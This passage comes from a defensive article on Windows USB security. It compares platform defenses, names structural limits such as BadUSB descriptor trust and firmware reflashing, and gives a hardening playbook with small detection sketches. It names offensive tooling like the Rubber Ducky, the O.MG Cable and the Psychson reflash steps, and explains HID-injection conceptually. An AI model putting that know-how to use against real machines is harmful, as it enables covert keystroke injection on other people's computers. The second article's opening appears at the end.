USB-IF Authentication Specification Revision 1.0. Published in the form of an ECN and errata dated January 7, 2019 [@usbif-auth-spec], this specification defines cryptographic peripheral identity using ECDSA P-256, X.509 certificate chains, and SHA-256 hashing -- the same primitives Windows already uses for KMCS and BitLocker. The standard exists. Windows ships no in-box consumer. No major host operating system in 2026 consumes it. The 2019 promise of cryptographic device identity has been seven years away for seven years.

Note: USB-IF Authentication 1.0 is the only mechanism in this entire roster that would architecturally close the BadUSB-class HID-injection problem. Every other defense in the table below mitigates the symptoms of the descriptor-trust gap. USB-IF Authentication would close the gap itself. It was published as an ECN seven years ago [@usbif-auth-spec]. Windows does not consume it. macOS does not consume it. Linux does not consume it. The defense is not absent because it is hard; it is absent because no host operating system has committed engineering to it. That is the institutional gap.

The SOTA roster, in a comparison table:

Mechanism	What it gates	Attack class addressed	Does NOT address
KMCS [@ms-kmcs]	Loading of unsigned `.sys` files into ring zero	Arbitrary kernel-mode driver loads	Descriptors a signed driver consumes
Kernel DMA Protection [@ms-kdp]	Pre-login + post-login DMA from Thunderbolt / USB4 PCIe endpoints	Thunderclap-class DMA attacks	USB 2.0/3.x storage and HID; pre-DMAR firmware platforms
ASR USB rule `b2b3f03d-...` [@ms-asr-rules]	Unsigned and untrusted process launch from USB-mounted volume	AutoRun-like execution; mass-storage-borne executables	HID-injection (no process is launched); descriptor-parser bugs
MDE Device Control [@ms-devcontrol]	Per-VID/PID/serial allow-deny on read, write, execute, file-walk	Any policy-named USB device class	Devices the policy explicitly allows
GPO Device Installation Restrictions [@ms-gpo-devinstall] [@ms-devsetupclasses]	Setup-class-wide allow-deny by Device Setup Class GUID	Whole-class blocks (e.g. all USB Storage)	Devices the policy allow-lists
BitLocker To Go [@ms-bitlocker]	Encryption of data at rest on removable USB volumes	Lost / stolen thumb drive	Malicious peripheral; host compromise
AutoRun-disable (KB971029 era) [@krebs-feb2011] [@wiki-autorun]	`autorun.inf`-driven AutoPlay launch on insert	Conficker-class AutoRun worms	HID injection; descriptor parser bugs
Driver Block List / Vulnerable Driver Block List [@ms-kmcs]	Loading of named known-bad signed `.sys` files	Bring-Your-Own-Vulnerable-Driver	New (unlisted) malicious-but-signed driver
USB-IF Authentication 1.0 [@usbif-auth-spec]	Cryptographic peripheral identity at enumeration	Descriptor-trust impossibility result (BadUSB)	(Standard exists; Windows does not consume it)

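{`
// Emulates the PowerShell check:
//   $p = Get-MpPreference
//   $p.AttackSurfaceReductionRules_Ids
//   $p.AttackSurfaceReductionRules_Actions
// In a real Windows 11 enterprise rollout, run the PowerShell as administrator.

// "Block untrusted and unsigned processes that run from USB"
const USB_RULE_GUID = "b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4";
const ACTION = { DISABLED: 0, BLOCK: 1, AUDIT: 2, WARN: 6 };

// Sample output that a healthy enterprise endpoint should produce.
const sample = {
  ids: [USB_RULE_GUID, "d4f940ab-401b-4efc-aadc-ad5f3c50688a", "75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84"],
  actions: [ACTION.BLOCK, ACTION.BLOCK, ACTION.BLOCK],
};

// The two arrays are parallel: actions[i] is the configured mode of ids[i].
const index = sample.ids.findIndex(id => id.toLowerCase() === USB_RULE_GUID);
const action = index === -1 ? ACTION.DISABLED : sample.actions[index];
console.log(action === ACTION.BLOCK ? "USB ASR rule: Block mode" : "USB ASR rule: NOT in Block mode");
`}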

Eight Windows-shipping mechanisms, one missing implementation. The implementation gap is structural: the only complete defense in the roster is the one Windows does not ship.

7. USB Security on Non-Windows Platforms

Windows is not the only OS that inherits USB's descriptor-trust premise. Every host operating system since 1996 has inherited the same contract; each has staked out a different position on how to live with it. The contrast clarifies what Windows chose.

macOS on Apple Silicon (Ventura 2022, extended in Sequoia 2024). Apple Support is verbatim on the prompt: "When you use a new or unknown USB accessory, Thunderbolt accessory, or SD card with your Mac laptop with Apple silicon, you get an alert that asks you to allow the accessory to connect" [@apple-mac-usb]. The same page documents the four user-selectable modes -- Always ask, Ask for new accessories, Automatically allow when unlocked, Always allow -- and the lockout window: "If your Mac has been locked for 3 or more days, you might need to unlock it to use a previously allowed accessory again" [@apple-mac-usb]. Apple is the only major host OS that ships a user-facing prompt as the default posture. Apple Silicon Macs appear to enforce the accessory prompt at the hardware level through the Secure Enclave Processor, not purely in software. This is architectural inference from Apple's general SEP-policy documentation; Apple Support pages describe the user-visible behavior, not the SEP-side enforcement chain. If the inference holds, the distinction matters because the prompt would not be a kernel-side policy that a privileged process can bypass.

iOS USB Restricted Mode (iOS 11.4.1, 2018; USB-C version, iOS 17+). Apple Support carries the iOS variant verbatim: "By default, you need to first unlock your iPhone or iPad to connect to an accessory or computer" [@apple-ios-usb]. Modern USB-C iPhones and iPads expose the same four-mode setting as the Mac: Always Ask, Ask for New Accessories, Automatically Allow When Unlocked, Always Allow [@apple-ios-usb]. iOS came first; macOS adopted the same UX pattern four years later.

ChromeOS. USB device authorization on ChromeOS is tied to the user-signin state; HID-class injection vectors are default-deny after suspend on managed devices. ChromeOS's documentation of the exact enforcement chain is sparse, so we will only describe what is publicly observable: the policy hooks exist, the enterprise-managed posture is default-deny, the consumer posture is default-allow.

Linux usbguard. The open-source usbguard daemon implements per-user, per-device USB authorization on top of the kernel's sysfs authorized flag [@usbguard]. The architectural cousin of Windows's Defender for Endpoint Device Control, usbguard ships a mature policy language (usbguard list-devices, usbguard allow-device, declarative rules.conf) and integrates cleanly with PolicyKit. The catch is that no major Linux distribution enables usbguard by default; it is opt-in software a sysadmin installs. Linux's kernel has had the authorized sysfs flag since 2007; what it has not had is a default-deny posture out of the box.

OpenBSD umass(4) / FreeBSD opt-in USB policy. The BSD family of operating systems ships conservative defaults: separated drivers per class, no autorun.inf-equivalent in the file manager, and a documented user-mode authorization story. Deployment scale is small; the design is included here only to illustrate that a default-deny posture is technically possible inside an inherited USB protocol contract.

The cross-platform comparison:

Platform	Default posture	Model	Pre-login HID injection	DMA isolation
Windows 11 25H2	Allow on insert	Policy frameworks layered over descriptor trust [@ms-asr-rules] [@ms-devcontrol] [@ms-gpo-devinstall]	Mitigated only by ASR USB rule + Device Control allow-list (enterprise opt-in)	Kernel DMA Protection on capable platforms [@ms-kdp]
macOS (Apple Silicon)	Prompt user	User-facing approval dialog, 3-day re-prompt window [@apple-mac-usb]	Mitigated by default prompt (consumer + enterprise)	Apple-managed IOMMU + SEP policy
iOS (USB-C)	Locked-until-unlock	User-facing approval dialog [@apple-ios-usb]	Mitigated by default prompt	Apple-managed IOMMU + SEP policy
ChromeOS (managed)	Default deny after suspend	Sign-in-state-gated authorization	Mitigated by default deny (managed devices)	Platform-IOMMU policy
Linux + usbguard	Default deny if installed	User-space daemon over kernel `authorized` flag [@usbguard]	Mitigated if `usbguard` installed (opt-in)	Distribution-dependent
Stock Linux	Allow on insert	Kernel `authorized` flag exists, default is allowed	Not mitigated	Distribution-dependent
OpenBSD / FreeBSD	Conservative by default	Per-class driver opt-in	Not the default attack surface (low deployment)	Limited

Two platforms (Apple's, both of them) prompt the user as the default posture. One (Linux) ships an opt-in user-space daemon. Windows is the only major platform that combines a kernel-mode device-control framework with cross-platform telemetry inside Microsoft Defender for Endpoint -- and the only one still relying entirely on enterprise opt-in for the HID-injection mitigation. The consumer default on Windows 11 25H2 is allow-on-insert.

8. What Windows Cannot Defend Against

We have walked the modern pipeline and seen the roster of defenses. We owe the reader a clean accounting of where the model is structural -- where no plausible Windows version closes the gap without breaking USB compatibility. There are five named limits, and none of them are bugs.

Limit 1: The descriptor-trust impossibility result. USB has, by specification, no out-of-band identity. A peripheral that declares itself to be a keyboard is a keyboard for purposes of the bus-enumeration handshake. The Wikipedia reference is explicit about the device-class architecture in which the peripheral, not the host, owns the declaration [@wiki-usb]. Until USB-IF Authentication (cryptographic device identity) is universal at the silicon level, this gap is structural to the protocol. Closing it on the host side -- by, say, refusing to bind a class driver until the device signs a challenge -- would break every existing USB device on the market.

Limit 2: HID-class trust is structural, not technical. A USB HID keyboard issues input events to the focused window. Windows has no way to know whether the user is the source of those events or whether a reprogrammed thumb drive is. The SR Labs disclosure is verbatim about why the host cannot tell the difference: the same Phison or Cypress controller chip that ships in a thumb drive can be reprogrammed to enumerate as a HID device with a vendor-controlled report descriptor [@srlabs-badusb-pdf] [@wiki-badusb]. Microsoft Defender for Endpoint Device Control supports granular HID rules, but they are opt-in, enterprise-only, and inherently break every external keyboard the policy does not allow. The structural cost of fixing this is breaking USB.

Limit 3: Firmware reprogrammability of commodity USB controllers. Phison, Cypress, Genesys, Realtek, and the rest of the commodity USB-controller market ship field-flashable firmware. The Psychson toolchain demonstrated the Phison PS2251-03 reflash end-to-end and made it reproducible in a researcher's afternoon: "firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector" [@psychson-repo]. The O.MG Cable productionized the technique inside a USB-A-to-Lightning cable form factor, proving the attack is now commercial-supply-chain-implantable [@omg-cable]. The host operating system has no view into the controller's firmware, no way to attest it, and no way to reject a peripheral that exposes a different identity post-flash than it did pre-flash.

Limit 4: Kernel DMA Protection is opt-in at three layers. Silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare DmaRemappingCompatible=1 in its INF) [@ms-kdp] [@ms-dmaremap]. Many post-2019 OEM platforms ship with the firmware toggle off in BIOS. Worse, the Thunderclap research demonstrated that even on IOMMU-enabled systems, shared IOMMU contexts between a peripheral and a kernel driver are a viable attack vector [@ndss-thunderclap]. KDP also has no view at all of USB 2.0/3.x mass storage or HID, which do not perform DMA.

Windows only uses the IOMMU in limited cases and remains vulnerable. -- Markettos, Rothwell, Gutstein, Pearce, Neumann, Moore, and Watson, *Thunderclap*, NDSS 2019 [@ndss-thunderclap]

Limit 5: The descriptor parser is C code in the kernel. usbhub3.sys and usbccgp.sys are partially undocumented, are closed-source, and parse adversarial input in a memory-unsafe language. Microsoft has not published the source for usbhub3.sys or usbccgp.sys; the architectural descriptions on Microsoft Learn describe the externally visible behavior of these drivers, not their internal parsing routines or memory-safety properties. Any claim about their specific implementation must be hedged accordingly. The conclusion that they parse adversarial input in C is inferred from the Windows-kernel codebase's language conventions and from the public record of descriptor-parser CVEs over the last fifteen years. Andy Davis named the surface in 2011 [@ncc-davis-2011], and Google's syzkaller-USB program -- a public-record proxy for the wider community's descriptor-parser fuzzing effort -- has been producing kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb]. Until the parser is rewritten in a memory-safe language, this is finite-but-non-zero kernel-mode attack surface. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Windows has not publicly committed to a similar rewrite.

Note: None of these five limits is a Windows bug. The descriptor-trust gap is in USB. The HID-class trust gap is in the HID class definition. The firmware-reprogrammability gap is in commodity controller silicon. The KDP gap is in the layered opt-in posture of IOMMU-on-platform DMA isolation. The C-in-the-kernel gap is the price of Windows's compatibility-first kernel-driver model. Closing any one of them on the Windows side, in isolation, would either break the USB device market (limits 1-3), require commodity-silicon redesign (limit 3 again), or require a multi-year rewrite the engineering organization has not committed to (limit 5).

Key idea: The USB attack surface on Windows is the price Windows pays for being USB-compatible. Five named gaps. Zero of them are bugs. Each is a structural cost of inheriting a 1996 protocol contract written when peripheral firmware was not field-flashable and the descriptor-trust assumption was at least defensible. In 2026 the assumption is indefensible and the contract is everywhere. The defense Windows ships is the best layered mitigation anyone has built around the gap; it does not close the gap.

9. Open Problems

If the limits are structural, the open problems are sociological: who adopts the standard that already exists, who funds the rewrite that nobody has shipped, who builds the heuristic that no production OS has.

USB-IF Authentication 2.0 / 3.0 uptake. The standard exists as a January 2019 ECN [@usbif-auth-spec]. Device-vendor uptake is near zero outside specialized industries (automotive, medical). Windows has no in-box consumer. The blocker is not cryptographic feasibility -- ECDSA P-256 over SHA-256 with X.509 chains is everyday code -- it is two-sided market adoption: peripheral vendors will not ship the silicon until host operating systems consume it; host operating systems will not consume it until enough peripherals ship it. One of the dominant host-OS vendors has to commit first. As of mid-2026 none has. Current best partial result: the same ECDSA-plus-X.509 attestation pattern has been deployed at scale in adjacent ecosystems -- Apple's Find My accessory-attestation network and the automotive / medical USB-Authentication-mandatory tiers -- demonstrating that the cryptographic primitive itself is silicon-shippable; what remains is OS-side consumption.

HID re-enumeration detection. A thumb drive that mounts as Mass Storage, presents a benign-looking volume for a few seconds, and then re-enumerates as a composite device that adds a HID keyboard interface is the BadUSB signature [@srlabs-badusb-pdf]. No production host operating system detects this generically. A reasonable heuristic -- that a freshly enumerated device which changes its declared composition in the first fifteen seconds is suspicious -- is not in any Microsoft Defender for Endpoint hunting query as a shipped detection, only as a custom Defender XDR query an enterprise can compose itself. The heuristic is this article's own proposal, not a published primary source. Current best partial result: mature Microsoft Defender Experts customers are already deploying custom Defender XDR hunting queries that key on the post-attach composition-change pattern (typically joined against the BadUSB 200 ms keystroke-burst signature in §10.4); the detection exists in mature managed-detection-and-response practices but has not landed as a default rule in any shipping product.
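The composition-change heuristic can be sketched in a few lines. This is a minimal illustration, not a shipped detection: the `EnumerationEvent` record and its field names are hypothetical (they are not a Defender XDR schema), and the sketch assumes some upstream collector already reports each enumeration with the port it occurred on and the interface classes the device declared.

```python
from dataclasses import dataclass

HID_CLASS = 0x03         # USB interface class code for HID
WINDOW_SECONDS = 15.0    # the window proposed in the text above


@dataclass(frozen=True)
class EnumerationEvent:
    """Hypothetical record shape; field names are illustrative only."""
    port: str                      # physical port path of the attach
    timestamp: float               # seconds since an arbitrary epoch
    interface_classes: frozenset   # class codes declared in this enumeration


def suspicious_reenumerations(events):
    """Return (first, later) pairs where a device on the same port
    re-enumerates inside the window and newly declares a HID interface."""
    first_seen = {}
    findings = []
    for ev in sorted(events, key=lambda e: e.timestamp):
        first = first_seen.get(ev.port)
        # No baseline yet, or the window has expired: treat as a fresh attach.
        if first is None or ev.timestamp - first.timestamp > WINDOW_SECONDS:
            first_seen[ev.port] = ev
            continue
        if HID_CLASS in ev.interface_classes - first.interface_classes:
            findings.append((first, ev))
    return findings
```

The sketch deliberately keys on the port rather than on VID/PID, since a reprogrammed device can change its declared identity along with its composition. It does not track detach events, which a real pipeline would need in order to avoid pairing two unrelated devices plugged into the same port in quick succession.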

USB-C Alternate Mode trust. DisplayPort Alt Mode, Thunderbolt Alt Mode, and USB4-tunneled PCIe each cross OS / firmware / silicon boundaries inside a single physical connector. The display-side firmware attack surface, the Power Delivery contract negotiation, and the "fast charge negotiation opens a data path" primitive that has emerged in commodity fast-charging hardware are all under-explored. Microsoft's Type-C UCM stack [@ms-typec] documents the connector-manager class extensions but does not (and cannot) verify the firmware behind the alt-mode peer. Current best partial result: the UCM UcmCx / UcmUcsiCx / UcmTcpciCx class-extension family ships in every Windows 11 SKU and gives the OS a uniform connector-state view it did not have before 2016 -- the partial mitigation is the architectural plumbing, not yet a firmware-attestation policy on top of it.

Supply-chain attacks on USB controller chips. The O.MG Cable shows that BadUSB is now manufacturing-implantable [@omg-cable]; the FBI's 2020 and 2022 FIN7 advisories show organized cybercriminal actors mailing the same primitive [@bleeping-fin7]. Hardware bill-of-materials attestation, Microsoft Defender for IoT inventory, and supply-chain risk-management frameworks (NIST SP 800-161 in the United States [@nist-sp-800-161]) are nascent on the consumer side and uneven on the enterprise side. Nothing on the consumer Windows endpoint defends the user from a cable that looks like a real cable. Current best partial result: the deployable enterprise stack is USB-IF Authentication 1.0 in the small set of authentication-capable peripherals [@usbif-auth-spec], plus Microsoft Defender for IoT device-inventory telemetry, plus per-organisation bring-your-own-cable allow-list policy primitives in Defender for Endpoint Device Control [@ms-devcontrol] -- a layered stack rather than a single defence.

Open-source memory-safe descriptor parser. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Microsoft has not committed to a similar rewrite. The bug-volume reduction from rewriting usbhub3.sys and usbccgp.sys in a memory-safe language would, on the basis of the public CVE record, dwarf any single mitigation in the article. The blocker is engineering scope, not technical feasibility. Current best partial result: the syzkaller-USB program has produced a continuously growing tally of kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb], proving the attack surface is empirically large; the upstream Rust-for-Linux USB driver experiments are the only public evidence that a memory-safe rewrite of a production USB stack is practical at scale.

Note: "Vendor adoption" sounds like a feature-request line item rather than an open research problem. It is structural. Until a host OS commits silicon-supply-chain weight to USB-IF Authentication, the standards body has no influence on the peripheral vendors; until the peripheral vendors ship Authentication-capable silicon, the host OS sees no installed base to support. Solving the two-sided-market problem is the open problem -- not the cryptography.

The shortest path to closing the descriptor-trust gap runs through silicon (USB-IF Authentication), not through Windows. Until then, every defense in this article is layered around the gap, not on top of it.

10. A 2026 USB-Security Playbook for Windows IT

We have done the structural accounting. The reader who got this far is either a Windows internals engineer who wants the exact stack picture or an IT operator who needs to deploy something on Monday. The next four sub-sections are for that operator.

For end users

Do not plug in cables you did not buy. Do not use public USB charging stations. Brian Krebs reported the original juice-jacking demonstration verbatim in August 2011: "In the three and a half days of this year's DefCon, at least 360 attendees plugged their smartphones into the charging kiosk built by the same guys who run the infamous Wall of Sheep ... Brian Markus, president of Aires Security, said he and fellow researchers Joseph Mlodzianowski and Robert Rowley built the charging kiosk to educate attendees about the potential perils of juicing up at random power stations" [@krebs-juicejacking]. CISA's 2023 juice-jacking advisory and the FBI Denver Field Office's April 6, 2023 X.com warning trace their evidence base to the Aires Security demonstration and its lineage [@wiki-juicejacking]. If you must charge in public, use a USB data-blocker dongle (a passive accessory that breaks the data pins and passes only power).

For IT admins on Windows 11 Enterprise

Note: A minimal Windows 11 Enterprise USB-hardening baseline, in priority order:

1. Enable Kernel DMA Protection. Verify msinfo32 shows "Kernel DMA Protection: On". On firmware where the toggle is off, work with the OEM to turn it on in BIOS. Documentation: [@ms-kdp].
2. Enable the ASR USB rule. Set GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 to Block via Intune or Group Policy. Verify with (Get-MpPreference).AttackSurfaceReductionRules_Ids. Documentation: [@ms-asr-rules].
3. Configure Defender for Endpoint Device Control. Default-deny Mass Storage. Allow corporate HID by VID/PID/serial allow-list. Documentation: [@ms-devcontrol].
4. Configure BitLocker To Go. Group Policy: Deny write access to removable drives not protected by BitLocker. Documentation: [@ms-bitlocker].
5. Configure GPO Device Installation Restrictions. Use AllowedDeviceClasses with explicit USB / HID setup-class GUIDs to constrain which device classes can be installed in the first place. Documentation: [@ms-gpo-devinstall] [@ms-devsetupclasses].
6. Audit USB device installation. Pull Event ID 6416 (PnP device installed) into your SIEM. Compose a Defender XDR hunting query for rapid-keystroke bursts in the first 15 seconds after a USB attach as a BadUSB / FIN7-style HID-injection signature [@bleeping-fin7].

*Not capable* means one of three things: the platform lacks an IOMMU (Intel VT-d or AMD-Vi disabled in firmware), the UEFI is not publishing the DMAR / IVRS ACPI tables, or no DMA-Remapping-compatible driver is loaded for at least one externally exposed peripheral. First check `Intel VT-d` or `AMD IOMMU` in the BIOS setup screen and enable them. If they are already on, confirm in `msinfo32` that *DMA Protection: ACPI* is *On* (the firmware-tables check). If the firmware is on and KDP still says *Not capable*, the per-driver opt-in path is the gap: open Device Manager and look at the *Hardware ID* tab of each Thunderbolt or USB4 peripheral; a driver without the `DmaRemappingCompatible=1` directive in its INF will not be IOMMU-isolated and downgrades the system-wide posture. The Microsoft Learn reference walks through the per-driver opt-in [@ms-dmaremap].

For driver developers

Declare DmaRemappingCompatible=1 in your INF if your hardware tolerates IOMMU isolation; this is a one-line directive change with a system-wide security posture improvement [@ms-dmaremap]. Prefer the WDF USB Lower / Upper filter pattern over legacy WDM; the framework's lifecycle and PnP plumbing are correct by construction in ways that legacy WDM code is not [@ms-usb-3-0-stack]. Validate every descriptor byte in user-mode tooling before relying on usbhub3.sys to do so; if your device cannot survive its own validator, the descriptor parser surface is wider than it needs to be. If you are writing a vendor-specific function driver, prefer winusb.sys over a custom KMDF function driver where possible [@ms-winusb]; less kernel-mode code is unambiguously better.
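As an illustration of what user-mode descriptor validation can look like, the sketch below walks a raw configuration-descriptor blob and checks only the structural invariants defined by the USB specification's standard descriptor layout (bLength, bDescriptorType, wTotalLength, bNumInterfaces). The function name and the choice of checks are assumptions made for this example; it is not a Microsoft tool and it says nothing about how usbhub3.sys parses the same bytes.

```python
import struct

# Standard descriptor type codes and their minimum lengths in bytes.
CONFIGURATION, INTERFACE, ENDPOINT = 0x02, 0x04, 0x05
MIN_LENGTHS = {CONFIGURATION: 9, INTERFACE: 9, ENDPOINT: 7}


def validate_configuration(blob: bytes) -> list:
    """Return a list of structural problems; empty means these checks passed."""
    if len(blob) < 9 or blob[1] != CONFIGURATION:
        return ["blob does not start with a configuration descriptor"]
    problems = []
    # wTotalLength is a little-endian u16 at offset 2; bNumInterfaces follows it.
    total_length, num_interfaces = struct.unpack_from("<HB", blob, 2)
    if total_length != len(blob):
        problems.append(f"wTotalLength {total_length} != actual {len(blob)}")
    offset, interfaces_seen = 0, set()
    while offset < len(blob):
        if offset + 2 > len(blob):
            problems.append(f"truncated descriptor header at offset {offset}")
            break
        b_length, b_type = blob[offset], blob[offset + 1]
        if b_length < 2:
            # A zero or one-byte length would stall or misalign the walk.
            problems.append(f"bLength {b_length} too small at offset {offset}")
            break
        if offset + b_length > len(blob):
            problems.append(f"descriptor at offset {offset} overruns the blob")
            break
        minimum = MIN_LENGTHS.get(b_type)
        if minimum is not None and b_length < minimum:
            problems.append(f"type {b_type:#04x} shorter than {minimum} bytes")
        elif b_type == INTERFACE:
            interfaces_seen.add(blob[offset + 2])  # bInterfaceNumber
        offset += b_length
    if len(interfaces_seen) != num_interfaces:
        problems.append(
            f"bNumInterfaces {num_interfaces} but {len(interfaces_seen)} found"
        )
    return problems
```

Minimum rather than exact lengths are used because some class specifications extend the standard descriptors. A production validator would also check class-specific descriptors, endpoint counts per interface, and string-descriptor indices, none of which this sketch attempts.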

For red team and blue team

The reproducible test devices are USB Rubber Ducky II + DuckyScript 3.0 [@hak5-shop-ducky] [@hak5-ducky-docs] and the O.MG Cable [@omg-cable]. For inspection, usbview.exe from the Windows SDK reads live descriptor trees out of usbhub3.sys and is the closest thing Windows has to a USB-side lsusb -v. For trace evidence, the ETW providers Microsoft-Windows-USB-USBHUB3 and Microsoft-Windows-USB-USBPORT (older stack) carry enumeration sequences with per-stage timing, documented end-to-end in Microsoft's USB Event Tracing for Windows reference [@ms-usb-etw]; wireshark + USBPcap reads the raw descriptor bytes if the kernel-side capture is permitted. For blue-team detection, the BadUSB signature is "first observed time-since-attach to first keystroke event is less than 200 ms"; legitimate human-driven keyboards do not type at that rate.
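The 200 ms signature reduces to a single subtraction once attach and keystroke timestamps are available. The sketch below assumes two hypothetical inputs, a mapping from device identifier to attach time and a mapping from device identifier to first keystroke time; how those are collected (ETW, EDR telemetry, or otherwise) is outside the sketch, and the device identifiers are made up.

```python
ATTACH_TO_KEYSTROKE_THRESHOLD_S = 0.200  # threshold quoted in the text


def flag_fast_typers(attach_times, first_keystroke_times):
    """Return sorted device ids whose first keystroke arrived less than
    200 ms after attach. Both arguments map device id -> seconds."""
    flagged = []
    for device_id, attached_at in attach_times.items():
        first_key_at = first_keystroke_times.get(device_id)
        if first_key_at is None:
            continue  # the device never typed; nothing to score
        delta = first_key_at - attached_at
        # Negative deltas indicate clock or correlation errors, not an attack.
        if 0 <= delta < ATTACH_TO_KEYSTROKE_THRESHOLD_S:
            flagged.append(device_id)
    return sorted(flagged)
```

An injector that simply sleeps before typing evades this check, which is why the text pairs it with the other layered controls rather than treating it as sufficient on its own.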

The playbook is layered defense. None of these controls closes the descriptor-trust gap; together they raise the cost enough that the BadUSB-class attacks the article opens with become attacker-uneconomical in a corporate context. The structural problem is still open.

11. Frequently Asked Questions

The reader has the model. These are the seven misconceptions the model corrects.

No. BitLocker To Go protects *the data on the stick* if you lose it. A reprogrammed thumb drive that re-enumerates as a HID keyboard is unaffected because BitLocker never sees it as a managed volume in the first place [@ms-bitlocker]. BitLocker is a confidentiality control for data at rest on a removable volume; the malicious-peripheral problem is a problem of *peripheral authentication*, which lies outside BitLocker's threat model.

No. KDP blocks pre-login DMA from PCIe-class peripherals tunneled over Thunderbolt 3, Thunderbolt 4, or USB4 [@ms-kdp]. A USB 2.0 thumb drive performs no DMA at all, so KDP is not in its defense chain. KDP is a defense against a different attack class than BadUSB. They are complementary, not substitutable.

No. Driver signing certifies that Microsoft (or a paid-up OEM signed under Microsoft's signing infrastructure) approved the driver *code* [@ms-kmcs] [@ms-drvsigning]. It does not certify the *descriptors* the driver consumes at runtime. The signed `hidclass.sys` will load happily and inject keystrokes for any HID-class device whose descriptor declares it to be a keyboard, including a reprogrammed thumb drive. KMCS is a defense of the kernel against malicious drivers, not a defense of the kernel against malicious peripherals presenting valid descriptors to honest drivers. The Aside in Section 5 walks this point in detail.

No, it closed one vector. The 2011 KB971029-equivalent rollout disabled `autorun.inf`-driven AutoPlay execution by default [@krebs-feb2011] [@wiki-autorun]. That vector was the load-bearing one for the Conficker era. It did not affect HID injection (which Hak5 had already commercialized in 2010), it did not affect descriptor-parser bugs (which Andy Davis named at Black Hat 2011 [@ncc-davis-2011]), and it did not affect the LNK-icon attack class (which the same Patch Tuesday addressed separately [@nvd-cve-2010-2568]). Each closed vector was a single-bug closure that left adjacent vectors intact.

Real. The cable is commercially available; the firmware is technically documented in the product's own materials [@omg-cable]; the same primitive (a USB cable with a WiFi-enabled implant) is now in the FBI's threat reporting on FIN7 mailed-USB campaigns [@bleeping-fin7]. On a stock Windows 11 25H2 endpoint, the O.MG Cable's HID-injection primitive works exactly as advertised unless explicit Microsoft Defender for Endpoint Device Control policy blocks the HID class for that VID/PID/serial [@ms-devcontrol]. It is not a movie trope.

Not yet, and not by itself. The USB-IF Authentication Specification Revision 1.0 ECN dates from January 7, 2019 [@usbif-auth-spec]. The standard defines ECDSA P-256 over SHA-256 with X.509 chains -- everyday cryptography. The structural problem is two-sided market adoption: no host operating system (Windows, macOS, Linux, ChromeOS) consumes the standard in-box in 2026, and no major device-certification tier requires it. Until that loop closes, the standard's existence is necessary but not sufficient.

Mostly, with significant cost. Disabling USB controllers at firmware time blocks every USB attack class because no descriptors are ever parsed. It also blocks every keyboard, every mouse, every security token, every licensed peripheral, every biometric reader, every printer that does not speak network protocols, and every legitimate file transfer onto and off of the endpoint. The cost is usually higher than the threat for general-purpose business endpoints, but the trade-off is a legitimate one for tightly scoped roles like air-gapped industrial-control workstations.

Plugging in a USB device is the single most-trusted action a user routinely performs on a Windows machine. Windows has done forty years of work to walk that trust back -- bit by bit, single-bug closure by single-bug closure, generation by generation. Some of that work is silicon-level (Kernel DMA Protection over IOMMU). Some of it is kernel-level (Kernel-Mode Code Signing chained to a Microsoft-trusted root). Some of it is application-level (Attack Surface Reduction, Device Control, AutoRun disablement, BitLocker To Go). None of it -- not one of the ten generations the article walks -- has touched the descriptor-trust premise itself. A peripheral's self-declared identity is still its identity at enumeration time, in 2026 as in 1996.

The next breakthrough on this stack will not come from Windows. It will come from USB-IF Authentication finally shipping in commodity peripheral silicon, and a host operating system committing to consume it in-box. That shipment has now been seven years away for seven years. When it arrives -- if it arrives -- the descriptor-trust gap closes, the BadUSB primitive becomes detectable in the bus enumeration handshake, and the eleven kernel-mode operations that begin at 10:42:17 each morning finally consult something the peripheral cannot fake. Until then, the gap is the gap, and the layered mitigations Windows ships are what stand between a Phison microcontroller and your domain administrator credentials.

Process Mitigation Policies: CFG, ACG, CIG, and the Layer Between App Identity and the Kernel

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Windows ships every modern memory-corruption mitigation as a per-process flag rather than a system-wide setting -- because Outlook can't enable CIG, Defender can't enable ACG, and Notepad doesn't need Disable-Win32k. `SetProcessMitigationPolicy` exposes twenty of these knobs (plus a `MaxProcessMitigationPolicy` sentinel that terminates the enum); the canonical six (DEP, ASLR, CFG, CET shadow stack, ACG, CIG) constrain the control-flow primitives, and the other fourteen cover adjacent attack surfaces. Each knob is a tombstone for an exploit primitive that worked in the previous generation. This article walks the thirty-year arc that built that surface, then names the residual attacks that survive even a fully-stacked process.

1. The bug is still there. Why didn't the exploit work?

A vulnerability researcher has just landed a type-confusion bug in a JavaScript engine inside an Edge content process. The primitive is exactly what they expected: a writable heap address holding a corrupted vtable pointer. From that pointer the renderer will, on its very next virtual-method call, jump into an address the attacker chose.

That is supposed to be game over. It is, in the language of every exploit-development textbook from 1996 onward, a working write-what-where. The CPU loads the corrupted pointer into a register. It dereferences it. It calls.

And the process dies.

There is no shell. There is no remote code execution. There is a Windows Error Reporting dialog and a STATUS_STACK_BUFFER_OVERRUN (exception code 0xC0000409, here carrying the fast-fail code FAST_FAIL_GUARD_ICALL_CHECK_FAILURE) in the crash log, raised from a thunk named ntdll!LdrpValidateUserCallTarget the researcher has never seen in their disassembler before. The bug fired exactly as the recipe said. The exploit chain didn't.

What stopped it?

Note: Every per-process mitigation in SetProcessMitigationPolicy is a tombstone for an exploit primitive that worked in the previous generation. The list of policies is, read top to bottom, an attacker's autobiography [@ms-setprocessmitigationpolicy].

A per-process, opt-in security policy installed via the Win32 `SetProcessMitigationPolicy` API (or, more safely, via `UpdateProcThreadAttribute` before a child process executes its first user-mode instruction). The `PROCESS_MITIGATION_POLICY` enum lists twenty-one values -- twenty actual policies plus the `MaxProcessMitigationPolicy` sentinel that terminates the enum -- as of Windows 11 24H2, each one a separate axis on which an exploit can fail [@ms-process-mitigation-enum] [@ms-setprocessmitigationpolicy].

